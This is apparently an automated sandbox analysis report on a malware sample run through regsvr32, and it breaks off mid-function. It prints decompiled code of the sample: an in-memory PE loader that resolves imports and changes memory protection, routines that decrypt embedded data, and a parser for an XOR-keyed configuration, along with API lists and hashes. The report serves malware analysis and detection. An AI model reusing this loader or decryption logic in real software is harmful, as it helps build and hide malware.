                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 8a39ad25f5b89e4f6b0a0dfb4dc2656ec55be820a32b6dc560a249893fd0a959
                                    • Instruction ID: cd851fc17cf9c7274774046bbef52915e6f2f7004d8f4f8a0a5e63904b8b2df5
                                    • Opcode Fuzzy Hash: 8a39ad25f5b89e4f6b0a0dfb4dc2656ec55be820a32b6dc560a249893fd0a959
                                    • Instruction Fuzzy Hash: 830126762043496BE3618EA9CC45D8AFBEEEB85774F210A1DE594932C0EB30A815CB75
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A5D1D, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 34%
                                    			E001A5D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x1aa2d4; // 0x314d7d0
				_t4 = _t15 + 0x1ab394; // 0x32f8b64
				_t20 = _t4;
				_t6 = _t15 + 0x1ab124; // 0x650047
				_t17 = E001A18B7(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E001A1440(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                    0x001a5d27
                                    0x001a5d29
                                    0x001a5d30
                                    0x001a5d31
                                    0x001a5d32
                                    0x001a5d33
                                    0x001a5d39
                                    0x001a5d3e
                                    0x001a5d3e
                                    0x001a5d48
                                    0x001a5d5a
                                    0x001a5d61
                                    0x001a5d90
                                    0x001a5d63
                                    0x001a5d68
                                    0x001a5d8d
                                    0x001a5d6a
                                    0x001a5d6d
                                    0x001a5d74
                                    0x001a5d7f
                                    0x001a5d76
                                    0x001a5d79
                                    0x001a5d79
                                    0x001a5d83
                                    0x001a5d83
                                    0x001a5d68
                                    0x001a5d97

                                    APIs
                                      • Part of subcall function 001A18B7: SysFreeString.OLEAUT32(?), ref: 001A1996
                                      • Part of subcall function 001A1440: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,001A3B57,004F0053,00000000,?), ref: 001A1449
                                      • Part of subcall function 001A1440: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,001A3B57,004F0053,00000000,?), ref: 001A1473
                                      • Part of subcall function 001A1440: memset.NTDLL ref: 001A1487
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A5D83
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: FreeString$lstrlenmemcpymemset
                                    • String ID:
                                    • API String ID: 397948122-0
                                    • Opcode ID: ea55518669df32f3dfe9aa8522e718e3bdc54809c1a2cbde10a9e5d21a731b60
                                    • Instruction ID: 2d6110037ceb1532e0154b8f82d6f8fb24992bcc0f6659a535d78e660b9f5fe8
                                    • Opcode Fuzzy Hash: ea55518669df32f3dfe9aa8522e718e3bdc54809c1a2cbde10a9e5d21a731b60
                                    • Instruction Fuzzy Hash: 6B01BC36508429BFDF11AFE8CC08DAEBBBAFB0A740F014825F905E2021E37099548791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C7160, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 6E2C71D1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String
                                    • String ID:
                                    • API String ID: 2568140703-0
                                    • Opcode ID: 8ab639d51ce2d1100d5a195f04b74e01387e84f7540a980df52e9a916a23dd6a
                                    • Instruction ID: e8933d708029fa2dd3e050e604aedf4dfbad7fbf47a736f533af7aa5cb4119a4
                                    • Opcode Fuzzy Hash: 8ab639d51ce2d1100d5a195f04b74e01387e84f7540a980df52e9a916a23dd6a
                                    • Instruction Fuzzy Hash: 0401133654050DBBDF425FA4CC09DEE3FA7EF08B20F044615FE186A160CA728931EB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C75C0, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E2C7601
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2d25dcd52a2c5d93f0372e08f56ff91f3863969c6bced34ab57dd85dd508f713
                                    • Instruction ID: 8838076acf4f95c606049799eef3ba49b650501bb2e45f3d48f5a537edc73f89
                                    • Opcode Fuzzy Hash: 2d25dcd52a2c5d93f0372e08f56ff91f3863969c6bced34ab57dd85dd508f713
                                    • Instruction Fuzzy Hash: 89F0B43155462F5BEBD21EFBD815E5A375BAF82FB1B104721AC249A1C0CB70E80086E7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C6FA2, Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Alloc
                                    • String ID:
                                    • API String ID: 2773662609-0
                                    • Opcode ID: b2c5025f444176b35522da56c5e26409924f1c456baee718426c38bab22b5027
                                    • Instruction ID: 7152bc17f5efc2c7ef1a1fc5de565d851a11c8407d1ec7cda0f69bab045ac212
                                    • Opcode Fuzzy Hash: b2c5025f444176b35522da56c5e26409924f1c456baee718426c38bab22b5027
                                    • Instruction Fuzzy Hash: 11E0A03555151CAB9A809BD6CC49EBEBB9BEB19F10B100659E81A5A200CE619A01C6E7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2C4F91, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • try_get_function.LIBVCRUNTIME ref: 6E2C4FA6
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: try_get_function
                                    • String ID:
                                    • API String ID: 2742660187-0
                                    • Opcode ID: 98c4b6270b823429caff4791982e5e85995db1d31119fff4bdc5bfa47970f8b3
                                    • Instruction ID: 93d8b2d7dcd603bc57270eac4e2ea153fccccf1af77f8db8875e891ba405ee3c
                                    • Opcode Fuzzy Hash: 98c4b6270b823429caff4791982e5e85995db1d31119fff4bdc5bfa47970f8b3
                                    • Instruction Fuzzy Hash: A8D0C23158192C63C5D021C1DC0AFBDBA06AB00EA3F040A62FB0A692408511C90082D3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1344, Relevance: 1.4, APIs: 1, Instructions: 105COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E6E2A1344(signed int** _a4, signed int* _a8, void* _a12) {
				signed int _v8;
				signed short _v12;
				signed int _v16;
				signed int _t53;
				void* _t54;
				void* _t62;
				void* _t70;
				signed int* _t73;
				signed int _t76;
				unsigned int _t78;
				int _t80;
				void _t86;
				intOrPtr _t87;
				signed short* _t90;

				_v8 = _v8 & 0x00000000;
				_t87 =  *0x6e2a41b0;
				_t52 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
				_t76 = ( *0x6e2a41cc ^ 0x0000150e) & 0x0000ffff;
				_v16 = _t76;
				_t90 = ( *( *((intOrPtr*)(_t87 + 0x3c)) + _t87 + 0x14) & 0x0000ffff) + ( *(_t52 + 6) & 0x0000ffff) * 0x28 + _t52 + 0x40;
				while(1) {
					_t53 =  *_t90 & 0x0000ffff;
					if(_t53 == 0) {
						break;
					}
					if(_t53 == _t76) {
						L5:
						_t54 = _a12;
						if(_t54 == 0 || _t90[4] == _t54) {
							if((_t90[1] & 0x00000002) != 0) {
								goto L17;
							} else {
								_t73 = E6E2A2102(_t90[8] + 1);
								if(_t73 == 0) {
									L16:
									_t76 = _v16;
									goto L17;
								} else {
									if((_t90[1] & 0x00000001) == 0) {
										_v8 = _t90[2];
										_t62 = _t90[6] + _t87;
										_t78 = _t90[8] >> 2;
										_a12 = _t73;
										while(_t78 != 0) {
											_t86 =  *_t62 - _v8;
											_v8 = _v8 + _t86;
											_a12 = _a12 + 4;
											_t62 = _t62 + 4;
											_t78 = _t78 - 1;
											 *_a12 = _t86;
										}
										_t80 = _t90[8] & 0x00000003;
										if(_t80 != 0) {
											memcpy(_a12, _t62, _t80);
										}
										_v8 = 1;
										goto L25;
									} else {
										_v12 = _t90[8];
										_t70 = E6E2A126E(_t90[6] + _t87, _t73); // executed
										if(_t70 == _v12) {
											_v8 = 1;
										}
										if(_v12 >= 4) {
											 *_t73 =  *_t73 ^ _t90[2];
										}
										if(_v8 != 0) {
											L25:
											 *((char*)(_t73 + _t90[8])) = 0;
											 *_a4 = _t73;
											 *_a8 = _t90[8];
										} else {
											E6E2A2117(_t73);
											goto L16;
										}
									}
								}
							}
						} else {
							L17:
							_t90 = _t90 + 0x14 + (_t90[1] & 0x000000ff) * 4;
							L18:
							if( *_t90 == _t76) {
								goto L5;
							} else {
							}
						}
					} else {
						_t90 =  &(_t90[0xa]);
						continue;
					}
					return _v8;
				}
				goto L18;
			}

















                                    0x6e2a1350
                                    0x6e2a1357
                                    0x6e2a1360
                                    0x6e2a1373
                                    0x6e2a1378
                                    0x6e2a137b
                                    0x6e2a1389
                                    0x6e2a1389
                                    0x6e2a138f
                                    0x00000000
                                    0x00000000
                                    0x6e2a1384
                                    0x6e2a1393
                                    0x6e2a1393
                                    0x6e2a1398
                                    0x6e2a13a3
                                    0x00000000
                                    0x6e2a13a5
                                    0x6e2a13af
                                    0x6e2a13b3
                                    0x6e2a13ef
                                    0x6e2a13ef
                                    0x00000000
                                    0x6e2a13b5
                                    0x6e2a13b9
                                    0x6e2a1407
                                    0x6e2a140d
                                    0x6e2a140f
                                    0x6e2a1412
                                    0x6e2a1415
                                    0x6e2a1419
                                    0x6e2a141f
                                    0x6e2a1422
                                    0x6e2a1426
                                    0x6e2a1429
                                    0x6e2a142a
                                    0x6e2a142a
                                    0x6e2a1431
                                    0x6e2a1434
                                    0x6e2a143b
                                    0x6e2a1440
                                    0x6e2a1443
                                    0x00000000
                                    0x6e2a13bb
                                    0x6e2a13be
                                    0x6e2a13c7
                                    0x6e2a13cf
                                    0x6e2a13d1
                                    0x6e2a13d1
                                    0x6e2a13dc
                                    0x6e2a13e1
                                    0x6e2a13e1
                                    0x6e2a13e7
                                    0x6e2a144a
                                    0x6e2a1450
                                    0x6e2a1457
                                    0x6e2a145c
                                    0x6e2a13e9
                                    0x6e2a13ea
                                    0x00000000
                                    0x6e2a13ea
                                    0x6e2a13e7
                                    0x6e2a13b9
                                    0x6e2a13b3
                                    0x6e2a13f2
                                    0x6e2a13f2
                                    0x6e2a13f6
                                    0x6e2a13fa
                                    0x6e2a13fd
                                    0x00000000
                                    0x00000000
                                    0x6e2a13ff
                                    0x6e2a13fd
                                    0x6e2a1386
                                    0x6e2a1386
                                    0x00000000
                                    0x6e2a1386
                                    0x6e2a1465
                                    0x6e2a1465
                                    0x00000000

                                    APIs
                                    • memcpy.NTDLL(?,?,?,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A143B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: a85cce4c3a9994f2e21673c5ed92fd7a64c45c5b9639a85579472cb190720769
                                    • Instruction ID: 395570d99e85d8a9027eba5e444b07eb0c63a7bdd314389e7773def05d1617fe
                                    • Opcode Fuzzy Hash: a85cce4c3a9994f2e21673c5ed92fd7a64c45c5b9639a85579472cb190720769
                                    • Instruction Fuzzy Hash: A04192B590035ADFDB11CF9CC890AAAB7F6FF40325F14885DDA9297A44D734E989CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1B55, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E6E2A1B55(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e2a41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45);
				_t18 = E6E2A165D( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e2a41cc - 0x69b24f45 &  !( *0x6e2a41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E2A119E(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E2A1552(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E2A1D96(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E2A2117(_t42);
					L8:
					return _t29;
				}
			}














                                    0x6e2a1b5d
                                    0x6e2a1b5f
                                    0x6e2a1b7b
                                    0x6e2a1b8c
                                    0x6e2a1b93
                                    0x6e2a1bf1
                                    0x00000000
                                    0x6e2a1b95
                                    0x6e2a1b95
                                    0x6e2a1b9f
                                    0x6e2a1ba3
                                    0x6e2a1ba8
                                    0x6e2a1bab
                                    0x6e2a1bb0
                                    0x6e2a1bb4
                                    0x6e2a1bb9
                                    0x6e2a1bbe
                                    0x6e2a1bc2
                                    0x6e2a1bc7
                                    0x6e2a1bc8
                                    0x6e2a1bcc
                                    0x6e2a1bd1
                                    0x6e2a1bd9
                                    0x6e2a1bd9
                                    0x6e2a1bd1
                                    0x6e2a1bc2
                                    0x6e2a1bb4
                                    0x6e2a1bdb
                                    0x6e2a1be4
                                    0x6e2a1be8
                                    0x6e2a1bf2
                                    0x6e2a1bf8
                                    0x6e2a1bf8

                                    APIs
                                      • Part of subcall function 6E2A165D: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E2A1681
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16A3
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16B9
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16CF
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16E5
                                      • Part of subcall function 6E2A165D: GetProcAddress.KERNEL32(00000000,?), ref: 6E2A16FB
                                      • Part of subcall function 6E2A119E: memcpy.NTDLL(?,?,?), ref: 6E2A11CB
                                      • Part of subcall function 6E2A119E: memcpy.NTDLL(?,?,?), ref: 6E2A11FE
                                      • Part of subcall function 6E2A1552: LoadLibraryA.KERNEL32 ref: 6E2A158A
                                      • Part of subcall function 6E2A1D96: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?), ref: 6E2A1DCF
                                      • Part of subcall function 6E2A1D96: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 6E2A1E44
                                      • Part of subcall function 6E2A1D96: GetLastError.KERNEL32 ref: 6E2A1E4A
                                    • GetLastError.KERNEL32 ref: 6E2A1BD3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 2673762927-0
                                    • Opcode ID: 3b62d01c878a8d3817ae1e2572123bba899bc1333192cb6f0c14a79f0bd3397c
                                    • Instruction ID: cfcc2937eea70d9f96997258f83d32b7eceb793c48ef7139edc7d65ef2bfa857
                                    • Opcode Fuzzy Hash: 3b62d01c878a8d3817ae1e2572123bba899bc1333192cb6f0c14a79f0bd3397c
                                    • Instruction Fuzzy Hash: B9113BBA60070AABD3109ADDCDC0DDF73BEAF893247040919EB0397504FB60ED4A87A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A6A1E, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E001A6A1E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E001A15D7(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x1aa290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E001A5D1D(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                                    0x001a6a1e
                                    0x001a6a26
                                    0x001a6a3d
                                    0x001a6a58
                                    0x001a6a5c
                                    0x001a6a61
                                    0x001a6a63
                                    0x001a6a73
                                    0x001a6a7f
                                    0x001a6a65
                                    0x001a6a65
                                    0x001a6a68
                                    0x001a6a6d
                                    0x001a6a6d
                                    0x001a6a63
                                    0x001a6a85
                                    0x001a6a89
                                    0x001a6a89
                                    0x001a6a32
                                    0x001a6a37
                                    0x001a6a3b
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                      • Part of subcall function 001A5D1D: SysFreeString.OLEAUT32(00000000), ref: 001A5D83
                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001A6A7F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Free$HeapString
                                    • String ID:
                                    • API String ID: 3806048269-0
                                    • Opcode ID: 6d2e705170da1ba5d126e4348a15985d542abdd8a3bd85bfe2e17a1d2d2a9854
                                    • Instruction ID: 641da3e80c4cdd5f2404a6b3cd2c54602e616cb2102fa69764c8b460c7469cbb
                                    • Opcode Fuzzy Hash: 6d2e705170da1ba5d126e4348a15985d542abdd8a3bd85bfe2e17a1d2d2a9854
                                    • Instruction Fuzzy Hash: BA01F63A100619BBCB229F84CC05FEA3B69FB16790F188029FE05AB120D731D960DB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A488A, Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E001A488A(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E001A3FAB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E001A77D7(_a8 + _a8);
					if(_t21 != 0) {
						E001A4324(_a4, _t21, _t23);
					}
					E001A77EC(_a4);
				}
				return _t21;
			}





                                    0x001a4892
                                    0x001a4899
                                    0x001a489b
                                    0x001a48aa
                                    0x001a48b1
                                    0x001a48c0
                                    0x001a48c4
                                    0x001a48cb
                                    0x001a48cb
                                    0x001a48d3
                                    0x001a48d8
                                    0x001a48dd

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A489B
                                      • Part of subcall function 001A3FAB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,001A48AF,00000001,001A72E3,00000000), ref: 001A3FE3
                                      • Part of subcall function 001A3FAB: memcpy.NTDLL(001A48AF,001A72E3,00000010,?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000), ref: 001A3FFC
                                      • Part of subcall function 001A3FAB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 001A4025
                                      • Part of subcall function 001A3FAB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 001A403D
                                      • Part of subcall function 001A3FAB: memcpy.NTDLL(00000000,00000000,032F9858,00000010), ref: 001A408F
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                    • String ID:
                                    • API String ID: 894908221-0
                                    • Opcode ID: 69426237203d36321cb5453e18020704d0a6db18ea3071a3321ac597967acbbb
                                    • Instruction ID: ec45c3458601b8e9c0311ba4cfafa65e8568b2fd308d7728cf78082205f14139
                                    • Opcode Fuzzy Hash: 69426237203d36321cb5453e18020704d0a6db18ea3071a3321ac597967acbbb
                                    • Instruction Fuzzy Hash: 6CF0FE7B100108BBCF116F95EC45DEB3BADEF96364B008022FD19CA511DB71DA55DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 001A2654, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225memoryCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E001A2654(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0x1aa2d0; // 0x69b25f44
				if(E001A57E5( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x1aa324 = _v8;
				}
				_t33 =  *0x1aa2d0; // 0x69b25f44
				if(E001A57E5( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0x1aa2d0; // 0x69b25f44
				if(E001A57E5( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0x1aa290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0x1aa2d0; // 0x69b25f44
						_t45 = E001A3154(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x1aa298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0x1aa2d0; // 0x69b25f44
						_t46 = E001A3154(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x1aa29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0x1aa2d0; // 0x69b25f44
						_t47 = E001A3154(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x1aa2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0x1aa2d0; // 0x69b25f44
						_t48 = E001A3154(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x1aa004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0x1aa2d0; // 0x69b25f44
						_t49 = E001A3154(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x1aa02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0x1aa2d0; // 0x69b25f44
						_t50 = E001A3154(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x1aa2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0x1aa2d0; // 0x69b25f44
								_t51 = E001A3154(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E001A496F(_t61);
